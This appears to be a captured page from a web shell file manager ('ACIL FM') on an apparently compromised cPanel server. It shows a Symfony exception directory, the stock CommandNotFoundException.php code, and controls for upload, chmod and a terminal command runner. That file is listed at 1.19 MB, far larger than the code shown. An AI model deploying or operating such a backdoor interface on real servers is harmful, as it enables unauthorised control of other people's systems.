ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/symfony/console/Exception
/
opt
cpanel
ea-wappspector
vendor
symfony
console
Exception
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
CommandNotFoundException.php
1.19 MB
chmod
View
DL
Edit
Rename
Delete
ExceptionInterface.php
425 B
chmod
View
DL
Edit
Rename
Delete
InvalidArgumentException.php
446 B
chmod
View
DL
Edit
Rename
Delete
InvalidOptionException.php
517 B
chmod
View
DL
Edit
Rename
Delete
LogicException.php
426 B
chmod
View
DL
Edit
Rename
Delete
MissingInputException.php
494 B
chmod
View
DL
Edit
Rename
Delete
NamespaceNotFoundException.php
474 B
chmod
View
DL
Edit
Rename
Delete
RuntimeException.php
430 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/symfony/console/Exception/CommandNotFoundException.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Console\Exception; /** * Represents an incorrect command name typed in the console. * * @author Jérôme Tamarelle <jerome@tamarelle.net> */ class CommandNotFoundException extends \InvalidArgumentException implements ExceptionInterface { private $alternatives; /** * @param string $message Exception message to throw * @param string[] $alternatives List of similar defined names * @param int $code Exception code * @param \Throwable|null $previous Previous exception used for the exception chaining */ public function __construct(string $message, array $alternatives = [], int $code = 0, ?\Throwable $previous = null) { parent::__construct($message, $code, $previous); $this->alternatives = $alternatives; } /** * @return string[] */ public function getAlternatives() { return $this->alternatives; } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply